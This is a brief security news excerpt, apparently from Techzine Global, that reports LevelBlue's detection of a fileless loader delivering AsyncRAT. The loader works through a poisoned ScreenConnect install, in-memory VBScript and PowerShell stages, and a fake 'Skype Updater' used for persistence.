"LevelBlue's SOC team has detected a fileless loader used to deploy AsyncRAT. AsyncRAT is one of the most popular examples of Malware-as-a-Service; attacks mainly target critical infrastructure in the US. It is a tool for remotely controlling devices. It disguises itself as a trusted utility and therefore regularly remains undetected. LevelBlue's most interesting discovery is not about the malware itself, but the way it ends up on devices."
"The legitimate RMM tool ScreenConnect was abused by the attackers in the incident highlighted by LevelBlue. The installation included the means to deploy AsyncRAT, but without separate files. After installing the poisoned version of ScreenConnect, a VBScript and PowerShell loader followed, which secretly ran components via external URLs. Only VBS files appeared on the disk, but the problematic consequences of this malware remained in RAM."
"Whenever a restart was needed for the malware, it was done via the malicious "Skype Updater," an app that is no longer used by Microsoft. Nevertheless, this background behavior is unlikely to be a sign that something is wrong for unsuspecting users. Encrypted The secret reinstallation, the key to the long-term existence of this version of AsyncRAT, takes place via an encrypted string. During runtime, this is decrypted and the malware is told to reinstall itself if necessary."
AsyncRAT operates as a fileless Malware-as-a-Service tool used to remotely control devices and steal credentials and cryptocurrency wallets. LevelBlue's SOC observed a fileless loader that delivers AsyncRAT by abusing the legitimate RMM tool ScreenConnect. Attackers install a poisoned ScreenConnect build, then deploy VBScript and PowerShell loaders that execute components directly from external URLs, leaving only VBS files on disk while payloads run in memory. Restarts are managed via a malicious "Skype Updater" and a runtime-decrypted encrypted string triggers reinstallation when needed. The malware hides persistence data under the normally hidden %AppData% directory.
Read at Techzine Global
Unable to calculate read time
Collection
[
|
...
]